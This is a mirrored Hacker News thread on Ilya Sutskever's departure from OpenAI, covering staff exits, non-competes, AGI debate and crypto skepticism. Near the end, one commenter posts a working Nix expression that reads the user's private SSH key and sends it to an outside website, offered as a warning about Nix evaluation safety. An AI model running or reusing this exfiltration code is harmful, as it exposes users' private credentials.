zlacker

Ilya Sutskever to leave OpenAI

submitted by wavela+(OP) on 2024-05-14 23:01:26 | 1124 points 754 comments
[view article] [source] [go to bottom]

NOTE: showing posts with links only show all posts
1. wavela+q[view] [source] 2024-05-14 23:05:22
>>wavela+(OP)
Altman's tweet (https://x.com/sama/status/1790518031640347056?s=46) makes it seem as if he wanted to stay, and Ilya disagreed and "chose" to depart. Very interesting framing.
39. reduce+O4[view] [source] 2024-05-14 23:42:16
>>wavela+(OP)
'Back in May 2023, before Ilya Sutskever started to speak at the event, I sat next to him and told him, “Ilya, I listened to all of your podcast interviews. And unlike Sam Altman, who spread the AI panic all over the place, you sound much more calm, rational, and nuanced. I think you do a really good service to your work, to what you develop, to OpenAI.” He blushed a bit, and said, “Oh, thank you. I appreciate the compliment.”

An hour and a half later, when we finished this talk, I looked at my friend and told her, “I’m taking back every single word that I said to Ilya.”

He freaked the hell out of people there. And we’re talking about AI professionals who work in the biggest AI labs in the Bay area. They were leaving the room, saying, “Holy shit.”

The snapshots above cannot capture the lengthy discussion. The point is that Ilya Sutskever took what you see in the media, the “AGI utopia vs. potential apocalypse” ideology, to the next level. It was traumatizing.'[0]

[0] What Ilya Sutskever Really Wants https://www.aipanic.news/p/what-ilya-sutskever-really-wants

◧◩
55. selcuk+86[view] [source] [discussion] 2024-05-14 23:57:32
>>wavela+q
Someone has already tried doing that, and it's pretty close:

https://twitter.com/eli_schein/status/1790520139164614820

◧◩◪
59. mbesto+i6[view] [source] [discussion] 2024-05-14 23:59:25
>>threes+85
> Most of the VCs have already spent their money in the last couple of years.

Lol no. There is about ~$500B in VC dollars, not to mention $1.2T in buyout dry powder still floating around. Not to mention venture funds raised continue to grow YoY.

https://www.bain.com/globalassets/noindex/2024/bain_report_g...

81. quylea+o8[view] [source] 2024-05-15 00:18:15
>>wavela+(OP)
Tesla also lost top AI lead [0]. Will they come to Apple?

[0] >>40361350

◧◩◪
82. cjbpri+s8[view] [source] [discussion] 2024-05-15 00:19:03
>>lr4444+I6
I think those are illegal now. They have been in California for a long time.

https://www.ftc.gov/news-events/news/press-releases/2024/04/...

◧◩◪◨⬒⬓
116. hacker+He[view] [source] [discussion] 2024-05-15 01:15:28
>>mikeg8+F8
https://www.nytimes.com/2024/03/07/technology/openai-executi...
◧◩
134. andsoi+Dg[view] [source] [discussion] 2024-05-15 01:36:09
>>ed_mer+j5
According to Mr Altman’s tweet (https://twitter.com/sama/status/1790518031640347056) they had not just one but TWO of the greatest minds of this generation.

After this change they will have only one.

144. Bjorkb+fh[view] [source] 2024-05-15 01:41:18
>>wavela+(OP)
Probably not related, but it's worth pointing out that Daniel Kokotajlo (https://www.lesswrong.com/users/daniel-kokotajlo) left last month.

But if it were related, then that would presumably be because people within the company (or at least two rather noteworthy people) no longer believe that OpenAI is acting in the best interests of humanity.

Which isn't too shocking really given that a decent chunk of us feel the same way, but then again, we're just nobodies making dumb comments on Hacker News. It's a little different when someone like Ilya really doesn't want to be at OpenAI.

◧◩◪
155. bkyan+Ai[view] [source] [discussion] 2024-05-15 01:54:50
>>hacker+Y1
Reid Hoffman provided some clear (at least to me) evidence for Mira's non-involvement → https://youtu.be/IgcUOOI-egk?si=FiSPt87v3pM3lfKt&t=851
◧◩◪◨
159. __Matr+1j[view] [source] [discussion] 2024-05-15 01:59:06
>>behnam+ch
I've been offered a "lump" of sugar before, and it was not a single sugar crystal. When I hear "large grain of salt" I imagine something like this https://crystalverse.com/sodium-chloride-crystals/, quite different than a lump.
◧◩◪◨⬒
219. ignora+Wo[view] [source] [discussion] 2024-05-15 03:07:59
>>reduce+Wm
You miss remember: https://www.youtube.com/watch?v=7nORLckDnmg&t=75

mirror: https://ghostarchive.org/varchive/7nORLckDnmg (1m 15s)

◧◩◪◨
247. branda+Ku[view] [source] [discussion] 2024-05-15 04:14:26
>>bkyan+Ai
Someone just above posted this, which shows that she did reach out to the board with concerns about his leadership style prior to the ouster: https://www.nytimes.com/2024/03/07/technology/openai-executi...
◧◩◪◨⬒
261. vitus+Qv[view] [source] [discussion] 2024-05-15 04:28:15
>>goatlo+Kh
Einstein wasn't arguing just against the Copenhagen interpretation, he was arguing against the very notion of physical nondeterminism.

In fact, his arguments against nonlocality were later disproven experimentally in the '80s, as quantum mechanics allowed for much higher fidelity predictions than could be explained by a hidden variable theory [0].

I don't think anyone _likes_ the Copenhagen interpretation per se, it's just the least objectionable choice (if you have to make one at all). Many-worlds sounds cool and all until you realize that it's essentially impossible to verify experimentally, and at that point you're discussing philosophy and what-if more than physics.

Intuition only gets you as far as the accuracy of your mental model. Is it intuitive that the volume enclosed by the unit hypersphere approaches zero [1] as its dimensions go to infinity? Or that photons have momentum, but no mass? Or you can draw higher-dimension Venn diagrams with sectors that have negative area? If these all make intuitive sense to you, I'm jealous that your intuition extends further than mine.

[0] https://en.wikipedia.org/wiki/Bell_test

[1] https://en.wikipedia.org/wiki/Volume_of_an_n-ball

◧◩◪
290. zandre+4z[view] [source] [discussion] 2024-05-15 05:11:21
>>surfin+ey
Non-competes were invalid in the state of California, and now are in the entirety of the U.S. [1]

[1] https://www.ftc.gov/news-events/news/press-releases/2024/04/...

◧◩◪◨
302. snigge+mA[view] [source] [discussion] 2024-05-15 05:28:33
>>justan+as
Incorrect, he led a recruiting battle for Ilya: https://www.youtube.com/watch?v=7nORLckDnmg&t=75s
◧◩◪◨
312. robotr+0B[view] [source] [discussion] 2024-05-15 05:35:16
>>seydor+ov
Times have changed.

https://machinelearning.apple.com/research

321. ascorb+6C[view] [source] 2024-05-15 05:45:41
>>wavela+(OP)
Jan Leike has said he's leaving too https://twitter.com/janleike/status/1790603862132596961
◧◩◪◨⬒
361. bbor+MH[view] [source] [discussion] 2024-05-15 06:52:10
>>Otomot+hG
As something of a (biased) expert: yes, it’s a big deal, and yes, this seemingly dumb breakthrough was the last missing piece. It takes a few dozen hours of philosophy to show why your brain is also composed of recursive structures of probabilistic machines, so forget that, it’s not neccesary, instead, take a glance at these two links:

1. Alan Turing on why we should never ever perform a Turing test: https://redirect.cs.umbc.edu/courses/471/papers/turing.pdf

2. Marvin Minsky on the “Frame Problem” that lead to one or two previous AI winters, and what an Intuitive algorithm might look like: https://ojs.aaai.org/aimagazine/index.php/aimagazine/article...

388. jakoza+8N[view] [source] 2024-05-15 07:49:15
>>wavela+(OP)
Jakub Pachocki is amazing. He was in top 20 in Polish algorithm competition:

https://oi.edu.pl/contestants/Jakub%20Pachocki/

◧◩
395. rfoo+UN[view] [source] [discussion] 2024-05-15 07:56:27
>>jakoza+8N
Wait, TIL Jakub Pachocki == meret [1], never made the connection.

[1] https://codeforces.com/profile/meret

◧◩◪◨⬒⬓⬔⧯
409. reduce+FP[view] [source] [discussion] 2024-05-15 08:11:18
>>Shrezz+9O
Kokotajlo: “To clarify: I did sign something when I joined the company, so I'm still not completely free to speak (still under confidentiality obligations). But I didn't take on any additional obligations when I left.

Unclear how to value the equity I gave up, but it probably would have been about 85% of my family's net worth at least.

Basically I wanted to retain my ability to criticize the company in the future.“

> but "stop working on your field of research" isn't going to happen.

We’re talking about NDA, obviously no-competes aren’t legal in CA

https://www.lesswrong.com/posts/kovCotfpTFWFXaxwi/?commentId...

◧◩◪◨⬒⬓
439. hugg+ZV[view] [source] [discussion] 2024-05-15 09:19:29
>>astran+sS
https://www.forbes.com/sites/jamesbroughel/2023/12/09/openai...
◧◩◪◨⬒
452. Miralt+SY[view] [source] [discussion] 2024-05-15 09:53:31
>>Otomot+hG
This paper and other similar works changed my opinion on that quite a bit. It shows that to perform text prediction, LLMs build complex internal models.

>>38893456

◧◩◪
459. chx+vZ[view] [source] [discussion] 2024-05-15 09:58:32
>>nabla9+pH
> When the next wave of new deep learning innovations sweeps the world,

that won't happen, the next scam will be different

it was crypto until FTX collapsed then the usual suspects led by a16z leaned on OpenAI to rush whatever they had on market hence the odd naming of ChatGPT 3.5.

When the hype is finally realized to be just mass printing bullshit -- relevant bullshit, yes, which sometimes can be useful but not billions of dollars of useful -- there will be something else.

Same old, same old. The only difference is there is no new catchy tunes. Yet? https://youtu.be/I6IQ_FOCE6I https://locusmag.com/2023/12/commentary-cory-doctorow-what-k...

◧◩◪◨
473. vinter+P21[view] [source] [discussion] 2024-05-15 10:40:58
>>debate+BL
Oops, I thought there was something odd, I got my rationality acronyms mixed up. Hutter's program was called AIXI (MIRI was the research lab).

Here is Leike's paper, coauthored with Hutter:

https://arxiv.org/abs/1510.04931

They can probably sum it up in their own paper better than I can, but AIXI was supposed to be a formalized, objective model of rationality. They knew from the start that it was uncomputable, but I think they hoped to use it as a sort of gold standard that you could approach.

But then it turned out that the choice of Turing machine, which can be (mostly) ignored for Kolmogorov complexity, can not be ignored in AIXI at all.

◧◩◪◨⬒⬓⬔⧯
527. luma+Jd1[view] [source] [discussion] 2024-05-15 12:08:08
>>cthalu+ed1
That's exactly what I'm talking about: https://i.imgur.com/sZ3tniY.jpeg
◧◩◪
558. sonofa+Ti1[view] [source] [discussion] 2024-05-15 12:42:00
>>izend+Yx
Aidan Gomez, Nick Frost, and Ivan Zhang, all of whom were Hinton's students at UofT started Cohere (https://cohere.com/about)
◧◩◪◨⬒
583. chx+ct1[view] [source] [discussion] 2024-05-15 13:37:51
>>trasht+X21
All crypto"currencies" with a transaction fee are negative sum games and as such , they are a scam. It's been nine years since the Washington Post admittedly somewhat clumsily but still drawn attention to this and people still insist it's something other than a scam. Despite heady articles about how it's going to solve world hunger, it's just a scam.

This round of AI is only capable of producing bullshit. Relevant bullshit but bullshit. This can be useful https://hachyderm.io/@inthehands/112006855076082650 but it doesn't mean it's more impactful than the Internet.

◧◩◪
655. Furiou+Sd2[view] [source] [discussion] 2024-05-15 17:12:52
>>nabla9+pH
Jakub Pachocki is taking over as chief scientist. https://analyticsindiamag.com/meet-jakub-pachocki-openais-ne...
◧◩◪◨⬒⬓⬔⧯▣▦
679. jagrsw+jt2[view] [source] [discussion] 2024-05-15 18:31:25
>>Jensso+of2
> A model that is as good as an average human but costs $10 000 per effective manhour to run is not very useful, but it is still an AGI.

Geohot (https://geohot.github.io/blog/) estimates that a human brain equivalent requires 20 PFLOPS. Current top-of-the-line GPUs are around 2 PFLOPS and consume up to 500W. Scaling that linearly results in 5kW, which translates to approximately 3 EUR per hour if I calculate correctly.

◧◩◪◨⬒⬓⬔⧯
705. sheesh+fe3[view] [source] [discussion] 2024-05-15 23:23:50
>>bsenft+f51
epic… and not a single of these “experts” likely can solve even a basic goat problem https://x.com/svpino/status/1790624957380342151
◧◩◪◨⬒⬓
732. CyberS+o15[view] [source] [discussion] 2024-05-16 16:46:07
>>karma_+nu
Hi, sorry for the unrelated comment. I actually wanted to reply to your comment at >>40208937 , but that comment was made too long ago and I can no longer reply to it directly.

In that comment, you wrote:

> It can delete your home directory or email your ssh private keys to Zimbabwe.

I thought that you might be interested to know that it is still possible to exfiltrate secrets by evaluating Nix expressions. Here is an example Nix expression which will upload your private SSH key to Zimbabwe's government's website (don't run this!):

    let
      pkgs = import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {};
    in
    builtins.fetchurl "https://www.zim.gov.zw/?${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"
It does not need --impure or any other unusual switches to work.

Hope this helps.

◧◩◪◨⬒⬓⬔
749. karma_+Gx9[view] [source] [discussion] 2024-05-18 10:25:07
>>CyberS+o15
How is that supposed to "delete my home directory"?

Also, it doesn't work:

    error: access to absolute path '/home/user/.ssh/id_rsa' is forbidden in restricted mode
Maybe you don't know about restrict-eval? All the CI for nixpkgs is done using that option, so it will never break anything. Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.

https://nixos.org/manual/nix/unstable/command-ref/conf-file....

Hope this helps.

I don't think it did. I'm not sure what it was supposed to help with.

◧◩◪◨⬒⬓⬔⧯
753. CyberS+eYj[view] [source] [discussion] 2024-05-22 06:26:04
>>karma_+Gx9
> How is that supposed to "delete my home directory"?

Ah, I over-quoted that part. My mistake.

> Also, it doesn't work:

It will work with the default Nix settings.

> Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.

One would need to first turn it on to be able to turn it off.

> https://nixos.org/manual/nix/unstable/command-ref/conf-file....

Indeed, note the default value.

> I don't think it did. I'm not sure what it was supposed to help with.

I was hoping that it would be interesting to you, but also help avoid spreading false information that might mislead people into evaluating Nix code when it's not safe to do so. But, I think I understand now that maybe you don't care about what happens to other people.

[go to top]